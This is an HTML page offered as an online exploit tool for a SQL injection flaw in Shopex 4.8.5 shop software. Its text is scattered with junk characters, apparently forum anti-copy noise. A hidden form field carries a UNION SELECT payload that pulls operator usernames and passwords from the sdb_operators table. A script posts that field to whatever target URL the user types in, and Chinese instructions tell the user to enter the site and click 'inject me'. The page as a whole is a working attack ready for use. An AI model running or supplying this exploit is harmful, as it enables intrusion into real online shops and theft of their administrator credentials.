<center>0 v, b' P+ s: J* o0 ~
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>2 J1 p0 j2 J: g: c1 j8 d
<form action="" method="post" name="submit_url"> r( F9 A& _ a) }
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
' Z, G+ l, O6 s/ `/ \8 f<input type="hidden" name="goods[goods_id]" value="3">
" Y: A3 v# k) C0 t5 @0 S<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
- | E' J2 D# g; b<input type="submit" value="给我注入" onclick=fsubmit()>0 q- C0 y$ |+ B! _/ P2 l
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com. H3 M) F3 N4 M" l, k
; J. e7 \7 Y5 w, g; @
<script> * u/ n5 W# O6 a' y5 \. N
function fsubmit(){ 5 C1 x1 w' h6 P1 R' I
form = document.forms[0]; ! u/ F. Q. Y8 |/ j$ Z4 I
form.action = form.url.value+'/?product-gnotify';
, O X: J R; H' {& H& K4 xform.submit(); / }3 `+ t: c! J. n' j; Z4 A+ K
} 5 }: U7 h- a8 Q$ F$ r- N; F# }, `0 d
</script>2 y+ J) G: ^& ?) n+ i3 O# C
|